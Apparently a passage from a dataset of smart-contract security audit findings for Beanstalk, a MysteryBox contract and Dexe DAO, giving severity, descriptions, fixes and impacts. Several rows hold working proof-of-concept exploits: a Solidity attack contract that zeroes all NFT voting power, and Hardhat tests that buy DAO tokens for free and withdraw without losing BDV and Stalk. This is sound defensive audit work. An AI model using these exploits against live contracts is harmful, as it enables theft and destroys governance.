include:\\n`EnrootFacet::enrootDeposit`\\n`EnrootFacet::enrootDeposits`\\n`MetaFacet::uri`\\n`ConvertFacet::_withdrawTokens`\\n`LibSilo::__mow`\\n`LibSilo::_removeDepositFromAccount`\\n`LibSilo::_removeDepositsFromAccount`\\n`Silo::_plant`\\n`TokenSilo::_deposit`\\n`TokenSilo::_transferDeposits`\\n`LibLegacyTokenSilo::_mowAndMigrate`\\n`LibTokenSilo::_mowAndMigrate`\\nAs can be observed, critical parts of the protocol are compromised, leading to further cascading issues.",```\\n_stemTipForToken = s.ss[token].milestoneStem +\\n int96(s.ss[token].stalkEarnedPerSeason).mul(\\n int96(s.season.current).sub(int96(s.ss[token].milestoneSeason))\\n );\\n```\\n +Both reserves should be checked in `LibWell::getWellPriceFromTwaReserves`,low,"```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n\\nCurrently, `LibWell::getWellPriceFromTwaReserves` sets the price to zero if the time-weighted average reserves of the zeroth reserve (for Wells, Bean) is zero. Given the implementation of `LibWell::setTwaReservesForWell`, and that a Pump failure will return an empty reserves array, it does not appear possible to encounter the case where one reserve can be zero without the other except for perhaps an exploit or migration scenario. Therefore, whilst unlikely, it is best to but best to ensure both reserves are non-zero to avoid a potential division by zero `reserve1` when calculating the price as a revert here would result in DoS of `SeasonFacet::gm`.\\n```\\nfunction setTwaReservesForWell(address well, uint256[] memory twaReserves) internal {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // if the length of twaReserves is 0, then return 0.\\n // the length of twaReserves should never be 1, but\\n // is added for safety.\\n if (twaReserves.length < 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n } else {\\n // safeCast not needed as the reserves are uint128 in the wells.\\n s.twaReserves[well].reserve0 = uint128(twaReserves[0]);\\n s.twaReserves[well].reserve1 = uint128(twaReserves[1]);\\n }\\n}\\n```\\n\\nAdditionally, to correctly implement the check identified by the comment in `LibWell::setTwaReservesForWell`, the time-weighted average reserves in storage should be reset if the array length is less-than or equal-to 1.",```\\n// LibWell::getWellPriceFromTwaReserves`\\n// Remove the line below\\n if (s.twaReserves[well].reserve0 == 0) {\\n// Add the line below\\n if (s.twaReserves[well].reserve0 == 0 || s.twaReserves[well].reserve1 == 0) {\\n price = 0;\\n} else {\\n\\n// LibWell::setTwaReservesForWell\\n// Remove the line below\\n if (twaReserves.length < 1) {\\n// Add the line below\\n if (twaReserves.length <= 1) {\\n delete s.twaReserves[well].reserve0;\\n delete s.twaReserves[well].reserve1;\\n} else {\\n```\\n,,```\\nfunction getWellPriceFromTwaReserves(address well) internal view returns (uint256 price) {\\n AppStorage storage s = LibAppStorage.diamondStorage();\\n // s.twaReserve[well] should be set prior to this function being called.\\n // 'price' is in terms of reserve0:reserve1.\\n if (s.twaReserves[well].reserve0 == 0) {\\n price = 0;\\n } else {\\n price = s.twaReserves[well].reserve0.mul(1e18).div(s.twaReserves[well].reserve1);\\n }\\n}\\n```\\n +Small unripe token withdrawals don't decrease BDV and Stalk,low,"For any whitelisted token where `bdvCalc(amountDeposited) < amountDeposited`, a user can deposit that token and then withdraw in small amounts to avoid decreasing BDV and Stalk. This is achieved by exploiting a rounding down to zero precision loss in LibTokenSilo::removeDepositFromAccount:\\n```\\n// @audit small unripe bean withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\n","`LibTokenSilo::removeDepositFromAccount` should revert if `removedBDV == 0`. A similar check already exists in `LibTokenSilo::depositWithBDV` but is missing in `removeDepositFromAccount()` when calculating `removedBDV` for partial withdrawals.\\nThe breaking of protocol invariants could lead to other serious issues that have not yet been identified but may well exist if core properties do not hold. We would urge the team to consider fixing this bug as soon as possible, prior to or as part of the BIP-39 upgrade.","An attacker can withdraw deposited assets without decreasing BDV and Stalk. While the cost to perform this attack is likely more than the value an attacker would stand to gain, the potential impact should definitely be explored more closely especially considering the introduction of the Unripe Chop Convert in BIP-39 as this could have other unintended consequences in relation to this bug (given that the inflated BDV of an Unripe Token will persist once deposit is converted to its ripe counterpart, potentially allowing value to be extracted that way depending on how this BDV is used/manipulated elsewhere).\\nThe other primary consideration for this bug is that it breaks the mechanism that Stalk is supposed to be lost when withdrawing deposited assets and keeps the `totalDepositedBdv` artificially high, violating the invariant that the `totalDepositedBdv` value for a token should be the sum of the BDV value of all the individual deposits.\\nProof of Concept: Add this PoC to `SiloToken.test.js` under the section describe(""1 deposit, some"", async function () {:\\n```\\nit('audit small unripe bean withdrawals dont decrease BDV and Stalks', async function () {\\n let initialUnripeBeanDeposited = to6('10');\\n let initialUnripeBeanDepositedBdv = '2355646';\\n let initialTotalStalk = pruneToStalk(initialUnripeBeanDeposited).add(toStalk('0.5'));\\n\\n // verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // snapshot EVM state as we want to restore it after testing the normal\\n // case works as expected\\n let snapshotId = await network.provider.send('evm_snapshot');\\n\\n // normal case: withdrawing total UNRIPE_BEAN correctly decreases BDV & removes stalks\\n const stem = await this.silo.seasonToStem(UNRIPE_BEAN, '10');\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, initialUnripeBeanDeposited, EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited == 0\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq('0');\\n // verify UNRIPE_BEAN totalDepositedBDV == 0\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq('0');\\n // verify silo.totalStalk() == 0\\n expect(await this.silo.totalStalk()).to.eq('0');\\n\\n // restore EVM state to snapshot prior to testing normal case\\n await network.provider.send(""evm_revert"", [snapshotId]);\\n\\n // re-verify initial state\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited);\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n\\n // attacker case: withdrawing small amounts of UNRIPE_BEAN doesn't decrease\\n // BDV and doesn't remove stalks. This lets an attacker withdraw their deposits\\n // without losing Stalks & breaks the invariant that the totalDepositedBDV should\\n // equal the sum of the BDV of all individual deposits\\n let smallWithdrawAmount = '4';\\n await this.silo.connect(user).withdrawDeposit(UNRIPE_BEAN, stem, smallWithdrawAmount, EXTERNAL);\\n\\n // verify UNRIPE_BEAN totalDeposited has been correctly decreased\\n expect(await this.silo.getTotalDeposited(UNRIPE_BEAN)).to.eq(initialUnripeBeanDeposited.sub(smallWithdrawAmount));\\n // verify UNRIPE_BEAN totalDepositedBDV remains unchanged!\\n expect(await this.silo.getTotalDepositedBdv(UNRIPE_BEAN)).to.eq(initialUnripeBeanDepositedBdv);\\n // verify silo.totalStalk() remains unchanged!\\n expect(await this.silo.totalStalk()).to.eq(initialTotalStalk);\\n});\\n```\\n\\nRun with: `npx hardhat test --grep ""audit small unripe bean withdrawals dont decrease BDV and Stalks""`.\\nAdditional Mainnet fork tests have been written to demonstrate the presence of this bug in the current and post-BIP-39 deployments of Beanstalk (see Appendix B).",```\\n// @audit small unripe bean withdrawals don't decrease BDV and Stalk\\n// due to rounding down to zero precision loss. Every token where\\n// `bdvCalc(amountDeposited) < amountDeposited` is vulnerable\\nuint256 removedBDV = amount.mul(crateBDV).div(crateAmount);\\n```\\n +Broken check in `MysteryBox::fulfillRandomWords()` fails to prevent same request being fulfilled multiple times,high,Consider the check which attempts to prevent the same request from being fulfilled multiple times:\\n```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n\\nThe problem is that `vrfRequests[_requestId].fulfilled` is never set to `true` anywhere and `vrfRequests[_requestId]` is deleted at the end of the function.,Set `vrfRequests[_requestId].fulfilled = true`.\\nConsider an optimized version which involves having 2 mappings `activeVrfRequests` and fulfilledVrfRequests:\\nrevert `if(fulfilledVrfRequests[_requestId])`\\nelse set `fulfilledVrfRequests[_requestId] = true`\\nfetch the matching active request into memory from `activeVrfRequests[_requestId]` and continue processing as normal\\nat the end `delete activeVrfRequests[_requestId]`\\nThis only stores forever the `requestId` : `bool` pair in `fulfilledVrfRequests`.\\nConsider a similar approach in `MysteryBox::fulfillBoxAmount()`.,The same request can be fulfilled multiple times which would override the previous randomly generated seed; a malicious provider who was also a mystery box minter could generate new randomness until they got a rare mystery box.,```\\nif (vrfRequests[_requestId].fulfilled) revert InvalidVrfState();\\n```\\n +Use low level `call()` to prevent gas griefing attacks when returned data not required,low,"Using `call()` when the returned data is not required unnecessarily exposes to gas griefing attacks from huge returned data payload. For example:\\n```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}("""");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIs the same as writing:\\n```\\n(bool sent, bytes memory data) = address(operatorAddress).call{value: msg.value}("""");\\nif (!sent) revert Unauthorized();\\n```\\n\\nIn both cases the returned data will have to be copied into memory exposing the contract to gas griefing attacks, even though the returned data is not required at all.","Use a low-level call when the returned data is not required, eg:\\n```\\nbool sent;\\nassembly {\\n sent := call(gas(), receiver, amount, 0, 0, 0, 0)\\n}\\nif (!sent) revert Unauthorized();\\n```\\n\\nConsider using ExcessivelySafeCall.",Contracts unnecessarily expose themselves to gas griefing attacks.,"```\\n(bool sent, ) = address(operatorAddress).call{value: msg.value}("""");\\nif (!sent) revert Unauthorized();\\n```\\n" +`TokenSaleProposal::buy` implicitly assumes that buy token has 18 decimals resulting in a potential total loss scenario for Dao Pool,high,"`TokenSaleProposalBuy::buy` is called by users looking to buy the DAO token using a pre-approved token. The exchange rate for this sale is pre-assigned for the specific tier. This function internally calls `TokenSaleProposalBuy::_purchaseWithCommission` to transfer funds from the buyer to the gov pool. Part of the transferred funds are used to pay the DexeDAO commission and balance funds are transferred to the `GovPool` address. To do this, `TokenSaleProposalBuy::_sendFunds` is called.\\n```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}("""");\\n require(success, ""TSP: failed to transfer ether"");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n\\nNote that this function assumes that the `amount` of ERC20 token is always 18 decimals. The `DecimalsConverter::from18` function converts from a base decimal (18) to token decimals. Note that the `amount` is directly passed by the buyer and there is no prior normalisation done to ensure the token decimals are converted to 18 decimals before the `_sendFunds` is called.","There are at least 2 options for mitigating this issue:\\nOption 1 - revise the design decision that all token amounts must be sent in 18 decimals even if the underlying token decimals are not 18, to instead that all token amounts should be sent in their native decimals and Dexe will convert everything.\\nOption 2 - keep current design but revert if `amount.from18(token.decimals()) == 0` in L90 or alternatively use the `from18Safe()` function which uses `_convertSafe()` that reverts if the conversion is 0.\\nThe project team should also examine other areas where the same pattern occurs which may have the same vulnerability and where it may be required to revert if the conversion returns 0:\\n`GovUserKeeper` L92, L116, L183\\n`GovPool` L248\\n`TokenSaleProposalWhitelist` L50\\n`ERC721Power` L113, L139\\n`TokenBalance` L35, L62","It is easy to see that for tokens with smaller decimals, eg. USDC with 6 decimals, will cause a total loss to the DAO. In such cases amount is presumed to be 18 decimals & on converting to token decimals(6), this number can round down to 0.\\nProof of Concept:\\nTier 1 allows users to buy DAO token at exchange rate, 1 DAO token = 1 USDC.\\nUser intends to buy 1000 Dao Tokens and calls `TokenSaleProposal::buy` with `buy(1, USDC, 1000*10**6)\\nDexe DAO Comission is assumed 0% for simplicity- > `sendFunds` is called with `sendFunds(USDC, govPool, 1000* 10**6)`\\n`DecimalConverter::from18` function is called on amount with base decimals 18, destination decimals 6: `from18(1000*10**6, 18, 6)`\\nthis gives `1000*10**6/10*(18-6) = 1000/ 10**6` which rounds to 0\\nBuyer can claim 1000 DAO tokens for free. This is a total loss to the DAO.\\nAdd PoC to TokenSaleProposal.test.js:\\nFirst add a new line around L76 to add new purchaseToken3:\\n```\\n let purchaseToken3;\\n```\\n\\nThen add a new line around L528:\\n```\\n purchaseToken3 = await ERC20Mock.new(""PurchaseMockedToken3"", ""PMT3"", 6);\\n```\\n\\nThen add a new tier around L712:\\n```\\n {\\n metadata: {\\n name: ""tier 9"",\\n description: ""the ninth tier"",\\n },\\n totalTokenProvided: wei(1000),\\n saleStartTime: timeNow.toString(),\\n saleEndTime: (timeNow + 10000).toString(),\\n claimLockDuration: ""0"",\\n saleTokenAddress: saleToken.address,\\n purchaseTokenAddresses: [purchaseToken3.address],\\n exchangeRates: [PRECISION.times(1).toFixed()],\\n minAllocationPerUser: 0,\\n maxAllocationPerUser: 0,\\n vestingSettings: {\\n vestingPercentage: ""0"",\\n vestingDuration: ""0"",\\n cliffPeriod: ""0"",\\n unlockStep: ""0"",\\n },\\n participationDetails: [],\\n },\\n```\\n\\nThen add the test itself under the section describe(""if added to whitelist"", () => {:\\n```\\n it(""audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO"", async () => {\\n await purchaseToken3.approve(tsp.address, wei(1000));\\n\\n // tier9 has the following parameters:\\n // totalTokenProvided : wei(1000)\\n // minAllocationPerUser : 0 (no min)\\n // maxAllocationPerUser : 0 (no max)\\n // exchangeRate : 1 sale token for every 1 purchaseToken\\n //\\n // purchaseToken3 has 6 decimal places\\n //\\n // mint purchase tokens to owner 1000 in 6 decimal places\\n // 1000 000000\\n let buyerInitTokens6Dec = 1000000000;\\n\\n await purchaseToken3.mint(OWNER, buyerInitTokens6Dec);\\n await purchaseToken3.approve(tsp.address, buyerInitTokens6Dec, { from: OWNER });\\n\\n //\\n // start: buyer has bought no tokens\\n let TIER9 = 9;\\n let purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, wei(0));\\n\\n // buyer attempts to purchase using 100 purchaseToken3 tokens\\n // purchaseToken3 has 6 decimals but all inputs to Dexe should be in\\n // 18 decimals, so buyer formats input amount to 18 decimals\\n // doing this first to verify it works correctly\\n let buyInput18Dec = wei(""100"");\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput18Dec);\\n\\n // buyer has bought wei(100) sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, buyInput18Dec);\\n\\n // buyer has 900 000000 remaining purchaseToken3 tokens\\n assert.equal((await purchaseToken3.balanceOf(OWNER)).toFixed(), ""900000000"");\\n\\n // next buyer attempts to purchase using 100 purchaseToken3 tokens\\n // but sends input formatted into native 6 decimals\\n // sends 6 decimal input: 100 000000\\n let buyInput6Dec = 100000000;\\n await tsp.buy(TIER9, purchaseToken3.address, buyInput6Dec);\\n\\n // buyer has bought an additional 100000000 sale tokens\\n purchaseView = userViewsToObjects(await tsp.getUserViews(OWNER, [TIER9]))[0].purchaseView;\\n assert.equal(purchaseView.claimTotalAmount, ""100000000000100000000"");\\n\\n // but the buyer still has 900 000000 remaining purchasetoken3 tokens\\n assert.equal((await purchaseToken3.balanceOf(OWNER)).toFixed(), ""900000000"");\\n\\n // by sending the input amount formatted to 6 decimal places,\\n // the buyer was able to buy small amounts of the token being sold\\n // for free!\\n });\\n```\\n\\nFinally run the test with: `npx hardhat test --grep ""audit buy implicitly assumes that buy token has 18 decimals resulting in loss to DAO""`","```\\n function _sendFunds(address token, address to, uint256 amount) internal {\\n if (token == ETHEREUM_ADDRESS) {\\n (bool success, ) = to.call{value: amount}("""");\\n require(success, ""TSP: failed to transfer ether"");\\n } else {\\n IERC20(token).safeTransferFrom(msg.sender, to, amount.from18(token.decimals())); //@audit -> amount is assumed to be 18 decimals\\n }\\n }\\n```\\n" +Attacker can destroy user voting power by setting `ERC721Power::totalPower` and all existing NFTs `currentPower` to 0,high,"Attacker can destroy user voting power by setting `ERC721Power::totalPower` & all existing nfts' `currentPower` to 0 via a permission-less attack contract by exploiting a discrepancy (""<"" vs ""<="") in `ERC721Power` L144 & L172:\\n```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n\\nThis attack has to be run on the exact block that power calculation starts (when block.timestamp == ERC721Power.powerCalcStartTimestamp).",Resolve the discrepancy between `ERC721Power` L144 & L172.,"`ERC721Power::totalPower` & all existing nft's `currentPower` are set 0, negating voting using `ERC721Power` since `totalPower` is read when creating the snapshot and `GovUserKeeper::getNftsPowerInTokensBySnapshot()` will return 0 same as if the nft contract didn't exist. Can also negatively affect the ability to create proposals.\\nThis attack is extremely devastating as the individual power of `ERC721Power` nfts can never be increased; it can only decrease over time if the required collateral is not deposited. By setting all nfts' `currentPower = 0` as soon as power calculation starts (block.timestamp == ERC721Power.powerCalcStartTimestamp) the `ERC721Power` contract is effectively completely bricked - there is no way to ""undo"" this attack unless the nft contract is replaced with a new contract.\\nDexe-DAO can be created using only nfts for voting; in this case this exploit which completely bricks the voting power of all nfts means a new DAO has to be re-deployed since no one can vote as everyone's voting power has been destroyed.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport ""../../gov/ERC721/ERC721Power.sol"";\\n\\nimport ""hardhat/console.sol"";\\n\\ncontract ERC721PowerAttack {\\n // this attack can decrease ERC721Power::totalPower by the the true max power of all\\n // the power nfts that exist (to zero), regardless of who owns them, and sets the current\\n // power of all nfts to zero, totally bricking the ERC721Power contract.\\n //\\n // this attack only works when block.timestamp == nftPower.powerCalcStartTimestamp\\n // as it takes advantage of a difference in getNftPower() & recalculateNftPower():\\n //\\n // getNftPower() returns 0 when block.timestamp <= powerCalcStartTimestamp\\n // recalculateNftPower returns 0 when block.timestamp < powerCalcStartTimestamp\\n function attack(\\n address nftPowerAddr,\\n uint256 initialTotalPower,\\n uint256 lastTokenId\\n ) external {\\n ERC721Power nftPower = ERC721Power(nftPowerAddr);\\n\\n // verify attack starts on the correct block\\n require(\\n block.timestamp == nftPower.powerCalcStartTimestamp(),\\n ""ERC721PowerAttack: attack requires block.timestamp == nftPower.powerCalcStartTimestamp""\\n );\\n\\n // verify totalPower() correct at starting block\\n require(\\n nftPower.totalPower() == initialTotalPower,\\n ""ERC721PowerAttack: incorrect initial totalPower""\\n );\\n\\n // call recalculateNftPower() for every nft, this:\\n // 1) decreases ERC721Power::totalPower by that nft's max power\\n // 2) sets that nft's currentPower = 0\\n for (uint256 i = 1; i <= lastTokenId; ) {\\n require(\\n nftPower.recalculateNftPower(i) == 0,\\n ""ERC721PowerAttack: recalculateNftPower() should return 0 for new nft power""\\n );\\n\\n unchecked {\\n ++i;\\n }\\n }\\n\\n require(\\n nftPower.totalPower() == 0,\\n ""ERC721PowerAttack: after attack finished totalPower should equal 0""\\n );\\n }\\n}\\n```\\n\\nAdd test harness to ERC721Power.test.js:\\n```\\n describe(""audit attacker can manipulate ERC721Power totalPower"", () => {\\n it(""audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0"", async () => {\\n // deploy the ERC721Power nft contract with:\\n // max power of each nft = 100\\n // power reduction 10%\\n // required collateral = 100\\n let maxPowerPerNft = toPercent(""100"");\\n let requiredCollateral = wei(""100"");\\n let powerCalcStartTime = (await getCurrentBlockTime()) + 1000;\\n // hack needed to start attack contract on exact block due to hardhat\\n // advancing block.timestamp in the background between function calls\\n let powerCalcStartTime2 = (await getCurrentBlockTime()) + 999;\\n\\n // create power nft contract\\n await deployNft(powerCalcStartTime, maxPowerPerNft, toPercent(""10""), requiredCollateral);\\n\\n // ERC721Power::totalPower should be zero as no nfts yet created\\n assert.equal((await nft.totalPower()).toFixed(), toPercent(""0"").times(1).toFixed());\\n\\n // create the attack contract\\n const ERC721PowerAttack = artifacts.require(""ERC721PowerAttack"");\\n let attackContract = await ERC721PowerAttack.new();\\n\\n // create 10 power nfts for SECOND\\n await nft.safeMint(SECOND, 1);\\n await nft.safeMint(SECOND, 2);\\n await nft.safeMint(SECOND, 3);\\n await nft.safeMint(SECOND, 4);\\n await nft.safeMint(SECOND, 5);\\n await nft.safeMint(SECOND, 6);\\n await nft.safeMint(SECOND, 7);\\n await nft.safeMint(SECOND, 8);\\n await nft.safeMint(SECOND, 9);\\n await nft.safeMint(SECOND, 10);\\n\\n // verify ERC721Power::totalPower has been increased by max power for all nfts\\n assert.equal((await nft.totalPower()).toFixed(), maxPowerPerNft.times(10).toFixed());\\n\\n // fast forward time to the start of power calculation\\n await setTime(powerCalcStartTime2);\\n\\n // launch the attack\\n await attackContract.attack(nft.address, maxPowerPerNft.times(10).toFixed(), 10);\\n });\\n });\\n```\\n\\nRun attack with: `npx hardhat test --grep ""audit attack 1 sets ERC721Power totalPower & all nft currentPower to 0""`","```\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n // @audit execution allowed to continue when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n // @audit getNftPower() returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since power\\n // calculation has just started, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit totalPower += 0 (newPower = 0 in above line)\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n // @audit will set nft's current power to 0\\n nftInfo.currentPower = newPower;\\n}\\n\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n // @audit execution always returns 0 when\\n // block.timestamp == powerCalcStartTimestamp\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n```\\n" +A malicious DAO Pool can create a token sale tier without actually transferring any DAO tokens,high,"`TokenSaleProposalCreate::createTier` is called by a DAO Pool owner to create a new token sale tier. A fundamental prerequisite for creating a tier is that the DAO Pool owner must transfer the `totalTokenProvided` amount of DAO tokens to the `TokenSaleProposal`.\\nCurrent implementation implements a low-level call to transfer tokens from `msg.sender(GovPool)` to `TokenSaleProposal` contract. However, the implementation fails to validate the token balances after the transfer is successful. We notice a `dev` comment stating ""return value is not checked intentionally"" - even so, this vulnerability is not related to checking return `status` but to verifying the contract balances before & after the call.\\n```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n\\nSince a DAO Pool owner can use any ERC20 as a DAO token, it is possible for a malicious Gov Pool owner to implement a custom ERC20 implementation of a token that overrides the `transferFrom` function. This function can override the standard ERC20 `transferFrom` logic that fakes a successful transfer without actually transferring underlying tokens.","Calculate the contract balance before and after the low-level call and verify if the account balance increases by `totalTokenProvided`. Please be mindful that this check is only valid for non-fee-on-transfer tokens. For fee-on-transfer tokens, the balance increase needs to be further adjusted for the transfer fees. Example code for non-free-on-transfer-tokens:\\n```\\n // transfer sale tokens to TokenSaleProposal and validate the transfer\\n IERC20 saleToken = IERC20(_tierInitParams.saleTokenAddress);\\n\\n // record balance before transfer in 18 decimals\\n uint256 balanceBefore18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // perform the transfer\\n saleToken.safeTransferFrom(\\n msg.sender,\\n address(this),\\n _tierInitParams.totalTokenProvided.from18Safe(_tierInitParams.saleTokenAddress)\\n );\\n\\n // record balance after the transfer in 18 decimals\\n uint256 balanceAfter18 = saleToken.balanceOf(address(this)).to18(_tierInitParams.saleTokenAddress);\\n\\n // verify that the transfer has actually occured to protect users from malicious\\n // sale tokens that don't actually send the tokens for the token sale\\n require(balanceAfter18 - balanceBefore18 == _tierInitParams.totalTokenProvided,\\n ""TSP: token sale proposal creation received incorrect amount of tokens""\\n );\\n```\\n","A fake tier can be created without the proportionate amount of DAO Pool token balance in the `TokenSaleProposal` contract. Naive users can participate in such a token sale assuming their DAO token claims will be honoured at a future date. Since the pool has insufficient token balance, any attempts to claim the DAO pool tokens can lead to a permanent DOS.","```\\nfunction createTier(\\n mapping(uint256 => ITokenSaleProposal.Tier) storage tiers,\\n uint256 newTierId,\\n ITokenSaleProposal.TierInitParams memory _tierInitParams\\n ) external {\\n\\n // rest of code.\\n /// @dev return value is not checked intentionally\\n > tierInitParams.saleTokenAddress.call(\\n abi.encodeWithSelector(\\n IERC20.transferFrom.selector,\\n msg.sender,\\n address(this),\\n totalTokenProvided\\n )\\n ); //@audit -> no check if the contract balance has increased proportional to the totalTokenProvided\\n }\\n```\\n" +Attacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0,high,"Attacker can at anytime dramatically lower `ERC721Power::totalPower` close to 0 using a permission-less attack contract by taking advantage of being able to call `ERC721Power::recalculateNftPower()` & `getNftPower()` for non-existent nfts:\\n```\\nfunction getNftPower(uint256 tokenId) public view override returns (uint256) {\\n if (block.timestamp <= powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit 0 for non-existent tokenId\\n uint256 collateral = nftInfos[tokenId].currentCollateral;\\n\\n // Calculate the minimum possible power based on the collateral of the nft\\n // @audit returns default maxPower for non-existent tokenId\\n uint256 maxNftPower = getMaxPowerForNft(tokenId);\\n uint256 minNftPower = maxNftPower.ratio(collateral, getRequiredCollateralForNft(tokenId));\\n minNftPower = maxNftPower.min(minNftPower);\\n\\n // Get last update and current power. Or set them to default if it is first iteration\\n // @audit both 0 for non-existent tokenId\\n uint64 lastUpdate = nftInfos[tokenId].lastUpdate;\\n uint256 currentPower = nftInfos[tokenId].currentPower;\\n\\n if (lastUpdate == 0) {\\n lastUpdate = powerCalcStartTimestamp;\\n // @audit currentPower set to maxNftPower which\\n // is just the default maxPower even for non-existent tokenId!\\n currentPower = maxNftPower;\\n }\\n\\n // Calculate reduction amount\\n uint256 powerReductionPercent = reductionPercent * (block.timestamp - lastUpdate);\\n uint256 powerReduction = currentPower.min(maxNftPower.percentage(powerReductionPercent));\\n uint256 newPotentialPower = currentPower - powerReduction;\\n\\n // @audit returns newPotentialPower slightly reduced\\n // from maxPower for non-existent tokenId\\n if (minNftPower <= newPotentialPower) {\\n return newPotentialPower;\\n }\\n\\n if (minNftPower <= currentPower) {\\n return minNftPower;\\n }\\n\\n return currentPower;\\n}\\n\\nfunction recalculateNftPower(uint256 tokenId) public override returns (uint256 newPower) {\\n if (block.timestamp < powerCalcStartTimestamp) {\\n return 0;\\n }\\n\\n // @audit newPower > 0 for non-existent tokenId\\n newPower = getNftPower(tokenId);\\n\\n NftInfo storage nftInfo = nftInfos[tokenId];\\n\\n // @audit as this is the first update since\\n // tokenId doesn't exist, totalPower will be\\n // subtracted by nft's max power\\n totalPower -= nftInfo.lastUpdate != 0 ? nftInfo.currentPower : getMaxPowerForNft(tokenId);\\n // @audit then totalPower is increased by newPower where:\\n // 0 < newPower < maxPower hence net decrease to totalPower\\n totalPower += newPower;\\n\\n nftInfo.lastUpdate = uint64(block.timestamp);\\n nftInfo.currentPower = newPower;\\n}\\n```\\n",`ERC721Power::recalculateNftPower()` should revert when called for non-existent nfts.,"`ERC721Power::totalPower` lowered to near 0. This can be used to artificially increase voting power since `totalPower` is read when creating the snapshot and is used as the divisor in `GovUserKeeper::getNftsPowerInTokensBySnapshot()`.\\nThis attack is pretty devastating as `ERC721Power::totalPower` can never be increased since the `currentPower` of individual nfts can only ever be decreased; there is no way to ""undo"" this attack unless the nft contract is replaced with a new contract.\\nProof of Concept: Add attack contract mock/utils/ERC721PowerAttack.sol:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.4;\\n\\nimport ""../../gov/ERC721/ERC721Power.sol"";\\n\\nimport 